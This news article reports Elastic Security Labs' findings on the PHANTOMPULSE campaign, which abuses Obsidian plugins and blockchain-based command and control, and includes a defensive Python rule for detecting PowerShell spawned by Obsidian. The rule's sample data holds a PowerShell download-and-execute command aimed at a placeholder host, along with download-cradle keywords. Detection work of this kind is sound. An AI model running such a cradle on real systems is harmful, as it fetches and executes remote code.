Researchers at Elastic Security Labs have identified an active malware campaign that uses fake venture capital recruiters on LinkedIn and Telegram to trick finance and crypto workers into installing malicious plugins inside the Obsidian note-taking app, then routes its command infrastructure through Ethereum blockchain transactions to evade takedown.
Malware delivered through social engineering
At the center of the campaign is a carefully orchestrated social engineering strategy designed to deliver PHANTOMPULSE malware without exploiting software vulnerabilities. Attackers pose as a venture capital firm, initiating contact with targets on LinkedIn before moving conversations to Telegram groups populated by multiple fake “partners.”
Victims are then invited to access what is presented as a company “management database” hosted on Obsidian. They are provided login credentials to a cloud-synced vault controlled by the attackers. Once access is granted, victims are instructed to enable community plugin synchronization—an action that unknowingly triggers the execution of malicious code.
According to Elastic Security Labs, the attackers abused legitimate plugins, including Shell Commands and Hider, to execute payloads when the vault is opened.
“Elastic Security Labs has identified a novel social engineering campaign that abuses the popular note-taking application, Obsidian, as an initial access vector,” — Elastic Security Labs, in its threat report.
This approach allows PHANTOMPULSE malware to operate under the guise of legitimate application behavior, making detection significantly more difficult.
PHANTOMPULSE malware uses advanced multi-stage attack chain
Once activated, the PHANTOMPULSE malware attack chain unfolds in multiple stages across both Windows and macOS systems. On Windows, the process begins with a PowerShell command executed via the compromised plugin, which downloads a secondary script from a remote server.
This script retrieves a loader known as PHANTOMPULL, which decrypts the AES-256-CBC-encrypted PHANTOMPULSE payload and injects it directly into memory. The malware avoids writing files to disk, relying instead on reflective loading techniques to remain stealthy.
The researchers described the malware as highly sophisticated, noting its AI-assisted development and advanced evasion capabilities.
“The chain culminates in the deployment of a previously undocumented RAT we are naming PHANTOMPULSE,” — Elastic Security Labs, Threat Intelligence Report.
On macOS, the attack employs an obfuscated AppleScript dropper that establishes persistence through LaunchAgents and retrieves additional payloads via remote command-and-control (C2) infrastructure.
Blockchain-based control makes PHANTOMPULSE malware harder to stop
One of the most notable features of PHANTOMPULSE malware is its decentralized command-and-control mechanism. Instead of relying solely on traditional servers, the malware retrieves its C2 instructions from blockchain transaction data.
Specifically, it queries Ethereum-compatible block explorers to extract encoded instructions from transaction input fields tied to a hardcoded wallet address. This allows attackers to update control servers dynamically without relying on fixed infrastructure.
However, researchers identified a critical flaw in this design.
“We identified a weakness in the C2 mechanism that allows for a takeover of the implants by responders,” — Elastic Security Labs, Threat Intelligence Report.
Because the malware does not verify the origin of blockchain transactions, security researchers or even third parties can potentially hijack infected systems by submitting newer transactions with alternative instructions.
PHANTOMPULSE malware underscores growing insider-style risks
The PHANTOMPULSE malware campaign reflects a broader shift in cyber threats, where attackers increasingly rely on human manipulation rather than technical exploits. By leveraging trusted platforms like Obsidian, the attackers bypass conventional antivirus detection and gain execution through legitimate application features.
Elastic Defend successfully detected and blocked the attack during early-stage execution in the observed case, preventing full deployment of the PHANTOMPULSE malware payload. The detection was triggered by suspicious PowerShell activity originating from the Obsidian process.
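The parent/child relationship the article describes, PowerShell spawned by the Obsidian process, is the kind of signal a detection rule can key on. The following is an added illustration written for this article, not Elastic's rule or the report's code; it assumes Sysmon-style process-creation fields (pid, image, parent_image, command_line) and runs over a constructed set of events.

```python
# Added example: flag PowerShell launched by the Obsidian process, the
# behaviour that triggered the Elastic Defend alert described in the article.
import json
import ntpath
from typing import Optional

# Command-line fragments suggesting a download cradle. Assumption: the article
# only says the PowerShell command fetched a script from a remote server, so
# these are the generic hints a rule author would typically add.
DOWNLOAD_HINTS = ("downloadstring", "invoke-webrequest", "iwr ",
                  "net.webclient", "http://", "https://")

def is_powershell(image: str) -> bool:
    return ntpath.basename(image).lower() in ("powershell.exe", "pwsh.exe")

def is_obsidian(image: str) -> bool:
    return ntpath.basename(image).lower() == "obsidian.exe"

def score_event(ev: dict) -> Optional[str]:
    """Severity for one process-creation event, or None if not of interest."""
    if not (is_obsidian(ev.get("parent_image", "")) and is_powershell(ev.get("image", ""))):
        return None
    cmd = ev.get("command_line", "").lower()
    if any(hint in cmd for hint in DOWNLOAD_HINTS):
        return "high"    # Obsidian -> PowerShell that reaches out to the network
    return "medium"      # any PowerShell child of a note-taking app is unusual

def triage(events_json: str) -> list:
    """Return [(pid, severity)] for every event worth an analyst's attention."""
    hits = []
    for ev in json.loads(events_json):
        sev = score_event(ev)
        if sev:
            hits.append((ev["pid"], sev))
    return hits

# Constructed sample events (not real telemetry), modelled on Sysmon event ID 1.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
OBS = r"C:\Users\u\AppData\Local\Obsidian\Obsidian.exe"
SAMPLE_EVENTS = json.dumps([
    {"pid": 4100, "image": OBS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "Obsidian.exe"},
    {"pid": 4188, "image": PS, "parent_image": OBS, "command_line":
     "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')\""},
    {"pid": 4200, "image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},
    {"pid": 4222, "image": PS, "parent_image": OBS, "command_line": "powershell.exe -c Get-Date"},
])

if __name__ == "__main__":
    print(triage(SAMPLE_EVENTS))  # [(4188, 'high'), (4222, 'medium')]
```

A production rule would also cover the plugin's other possible children and the macOS side (an AppleScript process creating LaunchAgents), which this snippet does not attempt.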
Despite this, the campaign highlights the risks facing organizations in high-value sectors such as finance and cryptocurrency, where employees are frequent targets of sophisticated social engineering.
The researchers emphasized that even secure and widely trusted tools can become attack vectors if misused.